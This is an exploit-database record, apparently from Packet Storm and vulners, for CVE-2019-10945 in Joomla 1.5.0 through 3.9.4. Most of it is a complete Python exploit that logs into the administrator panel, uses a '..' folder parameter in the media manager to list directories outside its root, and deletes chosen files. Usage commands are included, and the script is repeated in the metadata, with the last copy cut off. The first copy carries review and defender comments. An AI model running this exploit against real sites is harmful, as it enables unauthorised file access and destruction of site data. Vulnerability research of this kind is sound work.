ID PACKETSTORM:152515
Type packetstorm
Reporter Haboob Team
Modified 2019-04-16T00:00:00
Description
`# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion
# Date: 2019-March-13
# Exploit Author: Haboob Team
# Web Site: haboob.sa
# Email: research@haboob.sa
# Software Link: https://www.joomla.org/
# Versions: Joomla 1.5.0 through Joomla 3.9.4
# CVE : CVE-2019-10945
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945
#
# Usage:
# List files in the specified directory:
# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name>
#
# Delete file in specified directory
# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list> --rm=<file name>
import re
import tempfile
import pickle
import os
import hashlib
import urllib
try:
import click
except ImportError:
print("module 'click' doesn't exist, type: pip install click")
exit(0)
try:
import requests
except ImportError:
print("module 'requests' doesn't exist, type: pip install requests")
exit(0)
try:
import lxml.html
except ImportError:
print("module 'lxml' doesn't exist, type: pip install lxml")
exit(0)
# Query string appended to the administrator URL for every media-manager request below.
# Callers append the target directory straight after the trailing `folder=/..`; per the
# advisory text on this page, the unsanitised `folder` parameter is the flaw (CVE-2019-10945,
# "before 3.9.5"). Defender's view: administrator requests with option=com_media and a
# `folder` value containing `..` are what this script leaves in access logs.
mediaList = "?option=com_media&view=mediaList&tmpl=component&folder=/.."
# Banner printed unconditionally at start-up. The bare `print '''...'''` form is a
# Python 2 print statement, so the listing as a whole targets Python 2.
print '''
# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion
# Web Site: Haboob.sa
# Email: research@haboob.sa
# Versions: Joomla 1.5.0 through Joomla 3.9.4
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945
_ _ ____ ____ ____ ____
| | | | /\ | _ \ / __ \ / __ \| _ \
| |__| | / \ | |_) | | | | | | | |_) |
| __ | / /\ \ | _ <| | | | | | | _ <
| | | |/ ____ \| |_) | |__| | |__| | |_) |
|_| |_/_/ \_\____/ \____/ \____/|____/
'''
# click parameter type for --url: accepts only values shaped like an http(s) URL.
class URL(click.ParamType):
name = 'url'
# Scheme, then a dotted host name, `localhost` or a dotted quad, an optional port and an
# optional path/query, matched case-insensitively. The dotted-quad branch does not
# range-check octets (\d{1,3} also admits 999).
regex = re.compile(
r'^(?:http)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
# Conversion hook: a non-tuple value that does not match the pattern is rejected through
# self.fail(); otherwise the value is handed back unchanged.
# NOTE(review): indentation is lost in this listing, so the nesting of `return value`
# cannot be read from here.
def convert(self, value, param, ctx):
if not isinstance(value, tuple):
if re.match(self.regex, value) is None:
self.fail('invalid URL (%s)' % value, param, ctx)
return value
# GET `url` with the supplied cookies (5-second timeout), parse the body as HTML and
# return a pair: the XPath matches for `query`, and the cookies carried by the response.
# Any status other than 200 prints a fixed "404" message and exits with status 0, so a
# redirect, a 403 or a 500 is reported as "not found" and the process still signals success.
def getForm(url, query, cookie=''):
r = requests.get(url, cookies=cookie, timeout=5)
if r.status_code != 200:
print("invalid URL: 404 NOT FOUND!!")
exit(0)
# Re-encode the decoded text as UTF-8 bytes before handing it to the HTML parser.
page = r.text.encode('utf-8')
html = lxml.html.fromstring(page)
return html.xpath(query), r.cookies
# Log in to the administrator back end and cache the resulting session cookies.
# Steps, as written: GET the login page and collect every <input> name; build the POST
# body from the credentials plus the last input name set to 1 (presumably the per-session
# form token — confirm against the login form); POST without following redirects.
# 'aW5kZXgucGhw' is base64 for "index.php".
# A 200 answer is treated as a failed login: the alert text is printed and the script exits.
# Any other status is treated as success and its cookies go to get_cookies(), which
# writes them to the cache file only if none exists yet.
# NOTE(review): unlike getForm(), this POST sets no timeout.
def login(url, username, password):
csrf, cookie = getForm(url, '//input/@name')
postData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login',
'return': 'aW5kZXgucGhw', csrf[-1]: 1}
res = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False)
if res.status_code == 200:
html = lxml.html.fromstring(res.text)
msg = html.xpath("//div[@class='alert-message']/text()[1]")
print msg
exit()
else:
get_cookies(res.cookies.get_dict(), url, username, password)
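def save_cookies(requests_cookiejar, filename):
    """Pickle *requests_cookiejar* to *filename*, readable by its owner only.

    The caller in this file places the cache in the shared temp directory and the
    payload is an authenticated session, so the file is created with mode 0600
    instead of the umask default. The mode applies only when the file is created;
    an existing file keeps the permissions it already has.
    """
    # O_TRUNC keeps the overwrite semantics of the original open(filename, 'wb');
    # O_BINARY exists only on Windows and prevents newline translation there.
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, 'O_BINARY', 0)
    fd = os.open(filename, flags, 0o600)
    with os.fdopen(fd, 'wb') as f:
        pickle.dump(requests_cookiejar, f)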
# Unpickle and return whatever object `filename` holds.
# NOTE(review): pickle.load runs code embedded in the file it reads. The path comes from
# cookies_file_name(), i.e. a name in the shared temp directory derived only from
# url/username/password, so a file planted there by another local user would execute as
# whoever runs this script. A data-only format (e.g. JSON of the cookie dict) avoids that.
def load_cookies(filename):
with open(filename, 'rb') as f:
return pickle.load(f)
# Build the cache path: <temp dir>/<md5 hex of url+username+password>.Jcookie
# - The three values are concatenated with no separator, so different triples can
#   produce the same name (e.g. username "ab" + password "c" and "a" + "bc").
# - hashlib.md5() is handed a str, which works on Python 2 only; Python 3 requires bytes.
# - The path is joined with a literal "/" rather than os.path.join.
# NOTE(review): the file name is an unsalted MD5 that includes the password, left in a
# directory other local users can list.
def cookies_file_name(url, username, password):
result = hashlib.md5(str(url) + str(username) + str(password))
_dir = tempfile.gettempdir()
return _dir + "/" + result.hexdigest() + ".Jcookie"
# Return the cached cookies for this (url, username, password) when a cache file exists;
# otherwise write `req_cookie` to the cache and return it.
# An existing cache always wins: `req_cookie` is ignored in that case, and nothing here
# expires or validates the cached session, so a stale file is reused until it is removed.
# traversal() and removeFile() pass '' as `req_cookie` and rely on login() having
# populated the cache beforehand.
def get_cookies(req_cookie, url, username, password):
cookie_file = cookies_file_name(url, username, password)
if os.path.isfile(cookie_file):
return load_cookies(cookie_file)
else:
save_cookies(req_cookie, cookie_file)
return req_cookie
# Request the media list for `dir` (appended after the `folder=/..` prefix) using the
# cached session, and print the value of every `rm[]` input found in the returned page.
# `dir` defaults to None but is concatenated as a string; cli() always passes a str.
# The cookies returned by getForm() are assigned but not used afterwards, and the
# trailing `pass` has no effect.
def traversal(url, username, password, dir=None):
cookie = get_cookies('', url, username, password)
url = url + mediaList + dir
files, cookie = getForm(url, "//input[@name='rm[]']/@value", cookie)
for file in files:
print file
pass
# Issue the delete request for `file` inside `dir`, reusing the cached session.
# As written: load the media list page, take the first link with target="_top",
# URL-decode it, keep the part before 'folder=', replace the task name folder.delete
# with file.delete, then append the folder and rm[] values and fetch the result with GET.
# The alert text of the response is printed; an empty match is reported as "File does
# not exist", and a page without such a link as "404".
# Defender's view: the request is a GET carrying file.delete with a `folder` value that
# contains `..`; `dir` and `file` are concatenated without URL-encoding.
# urllib.unquote is the Python 2 location of this function.
def removeFile(baseurl, username, password, dir='', file=''):
cookie = get_cookies('', baseurl, username, password)
url = baseurl + mediaList + dir
link, _cookie = getForm(url, "//a[@target='_top']/@href", cookie)
if link:
link = urllib.unquote(link[0].encode("utf8"))
link = link.split('folder=')[0]
link = link.replace("folder.delete", "file.delete")
link = baseurl + link + "folder=/.." + dir + "&rm[]=" + file
msg, cookie = getForm(link, "//div[@class='alert-message']/text()[1]", cookie)
if len(msg) == 0:
print "ERROR : File does not exist"
else:
print msg
else:
print "ERROR:404 NOT FOUND!!"
# Command-line entry point. Declared as a click group that runs without a subcommand;
# no subcommands are registered in this listing.
# NOTE(review): --password is taken as a plain command-line option, so it ends up in
# shell history and is visible in the process list while the script runs.
@click.group(invoke_without_command=True)
@click.option('--url', type=URL(), help="Joomla Administrator URL", required=True)
@click.option('--username', type=str, help="Joomla Manager username", required=True)
@click.option('--password', type=str, help="Joomla Manager password", required=True)
@click.option('--dir', type=str, help="listing directory")
@click.option('--rm', type=str, help="delete file")
@click.pass_context
def cli(ctx, url, username, password, dir, rm):
url = url+"/"
# Log in only when no cache file exists for these credentials; an existing file is
# trusted as-is.
cookie_file = cookies_file_name(url, username, password)
if not os.path.isfile(cookie_file):
login(url, username, password)
# Normalise --dir to "/<name>" with no leading or trailing slashes of its own. After the
# "/" prefix is added the value always starts with "/", so the `dir == "../"` comparison
# below cannot match.
if dir is not None:
dir = dir.lstrip('/')
dir = dir.rstrip('/')
dir = "/" + dir
if dir == "/" or dir == "../" or dir == "/.":
dir = ''
else:
dir = ''
# Echoes the normalised directory before the request is made.
print dir
# --rm selects deletion; without it the directory is only listed.
if rm is not None:
removeFile(url, username, password, dir, rm)
else:
traversal(url, username, password, dir)
# Runs at import time as well: there is no `if __name__ == "__main__"` guard.
cli()
`
{"id": "PACKETSTORM:152515", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla 3.9.4 Arbitrary File Deletion / Directory Traversal", "description": "", "published": "2019-04-16T00:00:00", "modified": "2019-04-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/152515/Joomla-3.9.4-Arbitrary-File-Deletion-Directory-Traversal.html", "reporter": "Haboob Team", "references": [], "cvelist": ["CVE-2019-10945"], "lastseen": "2019-04-17T03:46:31", "viewCount": 41, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-10945"]}, {"type": "joomla", "idList": ["JOOMLA-777"]}, {"type": "exploitdb", "idList": ["EDB-ID:46710"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:A803156FD0F8DFEDED5A83B198A1673B"]}, {"type": "zdt", "idList": ["1337DAY-ID-32548"]}, {"type": "nessus", "idList": ["JOOMLA_395.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113369"]}], "modified": "2019-04-17T03:46:31", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2019-04-17T03:46:31", "rev": 2}, "vulnersScore": 6.1}, "sourceHref": "https://packetstormsecurity.com/files/download/152515/joomla394-traversaldelete.txt", "sourceData": "`# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion \n# Date: 2019-March-13 \n# Exploit Author: Haboob Team \n# Web Site: haboob.sa \n# Email: research@haboob.sa \n# Software Link: https://www.joomla.org/ \n# Versions: Joomla 1.5.0 through Joomla 3.9.4 \n# CVE : CVE-2019-10945 \n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945 \n# \n# Usage: \n# List files in the specified directory: \n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name> \n# \n# Delete file in specified directory \n# python exploit.py 
--url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list> --rm=<file name> \n \n \nimport re \nimport tempfile \nimport pickle \nimport os \nimport hashlib \nimport urllib \n \ntry: \nimport click \nexcept ImportError: \nprint(\"module 'click' doesn't exist, type: pip install click\") \nexit(0) \n \ntry: \nimport requests \nexcept ImportError: \nprint(\"module 'requests' doesn't exist, type: pip install requests\") \nexit(0) \ntry: \nimport lxml.html \nexcept ImportError: \nprint(\"module 'lxml' doesn't exist, type: pip install lxml\") \nexit(0) \n \nmediaList = \"?option=com_media&view=mediaList&tmpl=component&folder=/..\" \n \nprint ''' \n# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion \n# Web Site: Haboob.sa \n# Email: research@haboob.sa \n# Versions: Joomla 1.5.0 through Joomla 3.9.4 \n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945 \n_ _ ____ ____ ____ ____ \n| | | | /\\ | _ \\ / __ \\ / __ \\| _ \\ \n| |__| | / \\ | |_) | | | | | | | |_) | \n| __ | / /\\ \\ | _ <| | | | | | | _ < \n| | | |/ ____ \\| |_) | |__| | |__| | |_) | \n|_| |_/_/ \\_\\____/ \\____/ \\____/|____/ \n \n''' \nclass URL(click.ParamType): \nname = 'url' \nregex = re.compile( \nr'^(?:http)s?://' # http:// or https:// \nr'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' # domain... \nr'localhost|' # localhost... \nr'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip \nr'(?::\\d+)?' 
# optional port \nr'(?:/?|[/?]\\S+)$', re.IGNORECASE) \n \ndef convert(self, value, param, ctx): \nif not isinstance(value, tuple): \nif re.match(self.regex, value) is None: \nself.fail('invalid URL (%s)' % value, param, ctx) \nreturn value \n \n \ndef getForm(url, query, cookie=''): \nr = requests.get(url, cookies=cookie, timeout=5) \nif r.status_code != 200: \nprint(\"invalid URL: 404 NOT FOUND!!\") \nexit(0) \npage = r.text.encode('utf-8') \nhtml = lxml.html.fromstring(page) \nreturn html.xpath(query), r.cookies \n \n \ndef login(url, username, password): \ncsrf, cookie = getForm(url, '//input/@name') \npostData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login', \n'return': 'aW5kZXgucGhw', csrf[-1]: 1} \n \nres = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False) \nif res.status_code == 200: \nhtml = lxml.html.fromstring(res.text) \nmsg = html.xpath(\"//div[@class='alert-message']/text()[1]\") \nprint msg \nexit() \nelse: \nget_cookies(res.cookies.get_dict(), url, username, password) \n \n \ndef save_cookies(requests_cookiejar, filename): \nwith open(filename, 'wb') as f: \npickle.dump(requests_cookiejar, f) \n \n \ndef load_cookies(filename): \nwith open(filename, 'rb') as f: \nreturn pickle.load(f) \n \n \ndef cookies_file_name(url, username, password): \nresult = hashlib.md5(str(url) + str(username) + str(password)) \n_dir = tempfile.gettempdir() \nreturn _dir + \"/\" + result.hexdigest() + \".Jcookie\" \n \n \ndef get_cookies(req_cookie, url, username, password): \ncookie_file = cookies_file_name(url, username, password) \nif os.path.isfile(cookie_file): \nreturn load_cookies(cookie_file) \nelse: \nsave_cookies(req_cookie, cookie_file) \nreturn req_cookie \n \n \ndef traversal(url, username, password, dir=None): \ncookie = get_cookies('', url, username, password) \nurl = url + mediaList + dir \nfiles, cookie = getForm(url, \"//input[@name='rm[]']/@value\", cookie) \nfor file in files: \nprint 
file \npass \n \n \ndef removeFile(baseurl, username, password, dir='', file=''): \ncookie = get_cookies('', baseurl, username, password) \nurl = baseurl + mediaList + dir \nlink, _cookie = getForm(url, \"//a[@target='_top']/@href\", cookie) \nif link: \nlink = urllib.unquote(link[0].encode(\"utf8\")) \nlink = link.split('folder=')[0] \nlink = link.replace(\"folder.delete\", \"file.delete\") \nlink = baseurl + link + \"folder=/..\" + dir + \"&rm[]=\" + file \nmsg, cookie = getForm(link, \"//div[@class='alert-message']/text()[1]\", cookie) \nif len(msg) == 0: \nprint \"ERROR : File does not exist\" \nelse: \nprint msg \nelse: \nprint \"ERROR:404 NOT FOUND!!\" \n \n \n@click.group(invoke_without_command=True) \n@click.option('--url', type=URL(), help=\"Joomla Administrator URL\", required=True) \n@click.option('--username', type=str, help=\"Joomla Manager username\", required=True) \n@click.option('--password', type=str, help=\"Joomla Manager password\", required=True) \n@click.option('--dir', type=str, help=\"listing directory\") \n@click.option('--rm', type=str, help=\"delete file\") \n@click.pass_context \ndef cli(ctx, url, username, password, dir, rm): \nurl = url+\"/\" \ncookie_file = cookies_file_name(url, username, password) \nif not os.path.isfile(cookie_file): \nlogin(url, username, password) \nif dir is not None: \ndir = dir.lstrip('/') \ndir = dir.rstrip('/') \ndir = \"/\" + dir \nif dir == \"/\" or dir == \"../\" or dir == \"/.\": \ndir = '' \nelse: \ndir = '' \nprint dir \nif rm is not None: \nremoveFile(url, username, password, dir, rm) \nelse: \ntraversal(url, username, password, dir) \n \n \ncli() \n`\n"}
{"cve": [{"lastseen": "2021-02-02T07:12:47", "description": "An issue was discovered in Joomla! before 3.9.5. The Media Manager component does not properly sanitize the folder parameter, allowing attackers to act outside the media manager root directory.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-10T19:29:00", "title": "CVE-2019-10945", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10945"], "modified": "2019-04-17T17:18:00", "cpe": ["cpe:/a:joomla:joomla\\!:3.9.4"], "id": "CVE-2019-10945", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-10945", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomla:joomla\\!:3.9.4:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2019-04-17T21:41:20", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-04-16T00:00:00", "title": "Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10945"], 
"modified": "2019-04-16T00:00:00", "id": "1337DAY-ID-32548", "href": "https://0day.today/exploit/description/32548", "sourceData": "# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion\r\n# Exploit Author: Haboob Team\r\n# Web Site: haboob.sa\r\n# Email: [email\u00a0protected]\r\n# Software Link: https://www.joomla.org/\r\n# Versions: Joomla 1.5.0 through Joomla 3.9.4\r\n# CVE : CVE-2019-10945\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945\r\n#\r\n# Usage:\r\n# List files in the specified directory:\r\n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name>\r\n#\r\n# Delete file in specified directory\r\n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list> --rm=<file name>\r\n\r\n\r\nimport re\r\nimport tempfile\r\nimport pickle\r\nimport os\r\nimport hashlib\r\nimport urllib\r\n\r\ntry:\r\n import click\r\nexcept ImportError:\r\n print(\"module 'click' doesn't exist, type: pip install click\")\r\n exit(0)\r\n\r\ntry:\r\n import requests\r\nexcept ImportError:\r\n print(\"module 'requests' doesn't exist, type: pip install requests\")\r\n exit(0)\r\ntry:\r\n import lxml.html\r\nexcept ImportError:\r\n print(\"module 'lxml' doesn't exist, type: pip install lxml\")\r\n exit(0)\r\n\r\nmediaList = \"?option=com_media&view=mediaList&tmpl=component&folder=/..\"\r\n\r\nprint ''' \r\n# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion\r\n# Web Site: Haboob.sa\r\n# Email: [email\u00a0protected]\r\n# Versions: Joomla 1.5.0 through Joomla 3.9.4\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945 \r\n _ _ ____ ____ ____ ____ \r\n| | | | /\\ | _ \\ / __ \\ / __ \\| _ \\ \r\n| |__| | / \\ | |_) | | | | | | | |_) |\r\n| __ 
| / /\\ \\ | _ <| | | | | | | _ < \r\n| | | |/ ____ \\| |_) | |__| | |__| | |_) |\r\n|_| |_/_/ \\_\\____/ \\____/ \\____/|____/ \r\n \r\n'''\r\nclass URL(click.ParamType):\r\n name = 'url'\r\n regex = re.compile(\r\n r'^(?:http)s?://' # http:// or https://\r\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' # domain...\r\n r'localhost|' # localhost...\r\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\r\n r'(?::\\d+)?' # optional port\r\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\r\n\r\n def convert(self, value, param, ctx):\r\n if not isinstance(value, tuple):\r\n if re.match(self.regex, value) is None:\r\n self.fail('invalid URL (%s)' % value, param, ctx)\r\n return value\r\n\r\n\r\ndef getForm(url, query, cookie=''):\r\n r = requests.get(url, cookies=cookie, timeout=5)\r\n if r.status_code != 200:\r\n print(\"invalid URL: 404 NOT FOUND!!\")\r\n exit(0)\r\n page = r.text.encode('utf-8')\r\n html = lxml.html.fromstring(page)\r\n return html.xpath(query), r.cookies\r\n\r\n\r\ndef login(url, username, password):\r\n csrf, cookie = getForm(url, '//input/@name')\r\n postData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login',\r\n 'return': 'aW5kZXgucGhw', csrf[-1]: 1}\r\n\r\n res = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False)\r\n if res.status_code == 200:\r\n html = lxml.html.fromstring(res.text)\r\n msg = html.xpath(\"//div[@class='alert-message']/text()[1]\")\r\n print msg\r\n exit()\r\n else:\r\n get_cookies(res.cookies.get_dict(), url, username, password)\r\n\r\n\r\ndef save_cookies(requests_cookiejar, filename):\r\n with open(filename, 'wb') as f:\r\n pickle.dump(requests_cookiejar, f)\r\n\r\n\r\ndef load_cookies(filename):\r\n with open(filename, 'rb') as f:\r\n return pickle.load(f)\r\n\r\n\r\ndef cookies_file_name(url, username, password):\r\n result = hashlib.md5(str(url) + str(username) + str(password))\r\n _dir = tempfile.gettempdir()\r\n 
return _dir + \"/\" + result.hexdigest() + \".Jcookie\"\r\n\r\n\r\ndef get_cookies(req_cookie, url, username, password):\r\n cookie_file = cookies_file_name(url, username, password)\r\n if os.path.isfile(cookie_file):\r\n return load_cookies(cookie_file)\r\n else:\r\n save_cookies(req_cookie, cookie_file)\r\n return req_cookie\r\n\r\n\r\ndef traversal(url, username, password, dir=None):\r\n cookie = get_cookies('', url, username, password)\r\n url = url + mediaList + dir\r\n files, cookie = getForm(url, \"//input[@name='rm[]']/@value\", cookie)\r\n for file in files:\r\n print file\r\n pass\r\n\r\n\r\ndef removeFile(baseurl, username, password, dir='', file=''):\r\n cookie = get_cookies('', baseurl, username, password)\r\n url = baseurl + mediaList + dir\r\n link, _cookie = getForm(url, \"//a[@target='_top']/@href\", cookie)\r\n if link:\r\n link = urllib.unquote(link[0].encode(\"utf8\"))\r\n link = link.split('folder=')[0]\r\n link = link.replace(\"folder.delete\", \"file.delete\")\r\n link = baseurl + link + \"folder=/..\" + dir + \"&rm[]=\" + file\r\n msg, cookie = getForm(link, \"//div[@class='alert-message']/text()[1]\", cookie)\r\n if len(msg) == 0:\r\n print \"ERROR : File does not exist\"\r\n else:\r\n print msg\r\n else:\r\n print \"ERROR:404 NOT FOUND!!\"\r\n\r\n\r\n@click.group(invoke_without_command=True)\r\n@click.option('--url', type=URL(), help=\"Joomla Administrator URL\", required=True)\r\n@click.option('--username', type=str, help=\"Joomla Manager username\", required=True)\r\n@click.option('--password', type=str, help=\"Joomla Manager password\", required=True)\r\n@click.option('--dir', type=str, help=\"listing directory\")\r\n@click.option('--rm', type=str, help=\"delete file\")\r\n@click.pass_context\r\ndef cli(ctx, url, username, password, dir, rm):\r\n url = url+\"/\"\r\n cookie_file = cookies_file_name(url, username, password)\r\n if not os.path.isfile(cookie_file):\r\n login(url, username, password)\r\n if dir is not None:\r\n dir = 
dir.lstrip('/')\r\n dir = dir.rstrip('/')\r\n dir = \"/\" + dir\r\n if dir == \"/\" or dir == \"../\" or dir == \"/.\":\r\n dir = ''\r\n else:\r\n dir = ''\r\n print dir\r\n if rm is not None:\r\n removeFile(url, username, password, dir, rm)\r\n else:\r\n traversal(url, username, password, dir)\r\n\r\n\r\ncli()\n\n# 0day.today [2019-04-17] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/32548"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:22", "description": "\nJoomla Core 1.5.0 - 3.9.4 - Directory Traversal Authenticated Arbitrary File Deletion", "edition": 1, "published": "2019-04-16T00:00:00", "title": "Joomla Core 1.5.0 - 3.9.4 - Directory Traversal Authenticated Arbitrary File Deletion", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10945"], "modified": "2019-04-16T00:00:00", "id": "EXPLOITPACK:A803156FD0F8DFEDED5A83B198A1673B", "href": "", "sourceData": "# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion\n# Date: 2019-March-13\n# Exploit Author: Haboob Team\n# Web Site: haboob.sa\n# Email: research@haboob.sa\n# Software Link: https://www.joomla.org/\n# Versions: Joomla 1.5.0 through Joomla 3.9.4\n# CVE : CVE-2019-10945\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945\n#\n# Usage:\n# List files in the specified directory:\n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name>\n#\n# Delete file in specified directory\n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list> --rm=<file name>\n\n\nimport re\nimport tempfile\nimport pickle\nimport os\nimport hashlib\nimport urllib\n\ntry:\n import click\nexcept ImportError:\n print(\"module 'click' doesn't exist, 
type: pip install click\")\n exit(0)\n\ntry:\n import requests\nexcept ImportError:\n print(\"module 'requests' doesn't exist, type: pip install requests\")\n exit(0)\ntry:\n import lxml.html\nexcept ImportError:\n print(\"module 'lxml' doesn't exist, type: pip install lxml\")\n exit(0)\n\nmediaList = \"?option=com_media&view=mediaList&tmpl=component&folder=/..\"\n\nprint ''' \n# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion\n# Web Site: Haboob.sa\n# Email: research@haboob.sa\n# Versions: Joomla 1.5.0 through Joomla 3.9.4\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945 \n _ _ ____ ____ ____ ____ \n| | | | /\\ | _ \\ / __ \\ / __ \\| _ \\ \n| |__| | / \\ | |_) | | | | | | | |_) |\n| __ | / /\\ \\ | _ <| | | | | | | _ < \n| | | |/ ____ \\| |_) | |__| | |__| | |_) |\n|_| |_/_/ \\_\\____/ \\____/ \\____/|____/ \n \n'''\nclass URL(click.ParamType):\n name = 'url'\n regex = re.compile(\n r'^(?:http)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' # domain...\n r'localhost|' # localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' 
# optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n\n def convert(self, value, param, ctx):\n if not isinstance(value, tuple):\n if re.match(self.regex, value) is None:\n self.fail('invalid URL (%s)' % value, param, ctx)\n return value\n\n\ndef getForm(url, query, cookie=''):\n r = requests.get(url, cookies=cookie, timeout=5)\n if r.status_code != 200:\n print(\"invalid URL: 404 NOT FOUND!!\")\n exit(0)\n page = r.text.encode('utf-8')\n html = lxml.html.fromstring(page)\n return html.xpath(query), r.cookies\n\n\ndef login(url, username, password):\n csrf, cookie = getForm(url, '//input/@name')\n postData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login',\n 'return': 'aW5kZXgucGhw', csrf[-1]: 1}\n\n res = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False)\n if res.status_code == 200:\n html = lxml.html.fromstring(res.text)\n msg = html.xpath(\"//div[@class='alert-message']/text()[1]\")\n print msg\n exit()\n else:\n get_cookies(res.cookies.get_dict(), url, username, password)\n\n\ndef save_cookies(requests_cookiejar, filename):\n with open(filename, 'wb') as f:\n pickle.dump(requests_cookiejar, f)\n\n\ndef load_cookies(filename):\n with open(filename, 'rb') as f:\n return pickle.load(f)\n\n\ndef cookies_file_name(url, username, password):\n result = hashlib.md5(str(url) + str(username) + str(password))\n _dir = tempfile.gettempdir()\n return _dir + \"/\" + result.hexdigest() + \".Jcookie\"\n\n\ndef get_cookies(req_cookie, 